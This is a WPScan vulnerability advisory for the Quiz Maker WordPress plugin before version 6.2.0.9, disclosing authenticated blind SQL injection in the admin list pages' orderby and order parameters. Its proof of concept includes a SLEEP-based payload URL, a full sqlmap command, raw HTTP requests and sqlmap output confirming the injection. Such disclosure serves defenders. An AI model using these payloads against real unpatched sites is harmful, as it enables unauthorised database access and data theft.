WordPress Plugin Vulnerabilities
Quiz Maker < 6.2.0.9 - Multiple Authenticated Blind SQL Injections
Description
The plugin did not properly sanitise and escape the order and orderby parameters before using them in SQL statements, leading to SQL injection issues in the admin dashboard
When we (WPScanTeam) confirmed the issues, more SQL Injections were identified, reported and fixed by the vendor but have not been detailed here.
Proof of Concept
All the files in includes/lists/ were affected and the PoC below are just examples of them https://example.com/wp-admin/admin.php?page=quiz-maker-question-categories&orderby=title%20AND%20(SELECT%206418%20FROM%20(SELECT(SLEEP(5)))PLuH)&order=asc SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs With r.txt is GET OR POST requests to sort quiz: GET /wp-admin/admin.php?page=quiz-maker&orderby=id--&order=desc HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 OR : POST /wp-admin/admin.php?page=quiz-maker HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 87 Connection: close Cookie: [admin+] orderby=id--&order=desc&s=d&action=-1&paged=1&filterby-top=&action2=-1&filterby-bottom= SQLMAP OUTPUT: --- Parameter: orderby (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=quiz-maker&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc --- [22:38:25] [INFO] testing MySQL [22:38:25] [INFO] confirming MySQL [22:38:25] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 8.0.0
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
To Quang Duong
Submitter
duongtq
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-29 (about 2 years ago)
Added
2021-06-29 (about 2 years ago)
Last Updated
2022-01-17 (about 2 years ago)